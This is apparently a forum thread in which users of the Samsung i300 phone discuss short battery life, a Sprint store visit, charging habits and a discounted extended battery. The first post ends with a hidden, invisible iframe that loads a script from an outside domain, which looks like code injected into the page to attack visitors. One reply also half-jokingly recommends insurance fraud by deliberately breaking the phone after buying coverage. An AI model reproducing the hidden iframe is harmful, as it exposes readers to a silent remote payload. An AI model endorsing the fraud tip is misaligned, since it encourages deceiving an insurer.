I am having issue with one of my I300 batteries. It lasts maybe a day talking 30-40 minutes and seems to always be hungry for a charge. It's been this way since I got the phone 4 months ago. Conversely, my other battery seems to work much better. I can get 2-3 days of stand by and talk time is very close to the advertised 4 hours. Has anyone else had a similar issue? I'm wondering if I have a bad battery. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
My phone lasts on one battery for about 4 hours of standby. Then, down she goes!
I took it to the Sprint store and explained the situation and asked them to put it on a diagnostic machine to see if there was something wrong with the phone.
The tech rep at the store came back and said the phone was fine and he didn't know what was causing the problem, and gave me an extra battery.
While the extra battery was a nice gesture, I don't want to have to carry three batteries to get through the day. Does anyone have any suggestions?
Any help will be greatly appreciated.

are you observeing your batery lights to make sure they are steady red and then steady green when full? ra eyou noticing your area coverage while the phone is not in use and in use? fringe areas drain the battery very fast...
I just returned home from Hawaii yesterday, so I don't know if this is true everywhere, but CompUSA in Honolulu is selling the extended battery for the i300 for $29.95. Needless to say, I bought one. Two weeks ago, they were selling exactly the same battery for about $80.00.
I have 2 standard batts and 1 extended batt. The short life you are getting from your 3 batts is not something that I have experienced - you may want to see if Samsung or Sprint will replace your phone - or just get the insurance from Sprint, wait 30 days, then 'lose' your phone against the concrete (oh man, that would feel so good sometimes) and get a replacement. Whatever you do, I can tell you that I am getting much better life from mine - and if all the batts are giving you probs, it seems only logical that it is the phone - if you get a full charge symbol when you put a fresh batt on the phone.

This would be great, IF the new i330 will be able to use them. Anybody know if the batteries for the new unit will be the same as the i300? My instinct says no -- which might explain the sudden drastic price cut.
